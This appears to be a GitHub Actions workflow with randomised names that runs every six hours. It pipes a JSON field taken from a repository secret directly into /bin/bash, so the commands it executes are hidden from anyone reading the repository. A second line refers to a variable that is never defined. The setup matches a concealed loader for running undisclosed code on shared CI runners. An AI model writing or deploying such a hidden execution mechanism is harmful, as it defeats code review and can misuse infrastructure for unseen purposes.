name: surmiseblouse
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: surmiseblouse
        env:
          kjx98: ${{ secrets.kjx98 }}
        run: |
          echo $kjx98 | jq -r .fm48513 | /bin/bash
          echo $xjwnk78666 | jq -r .x525 | /bin/bash

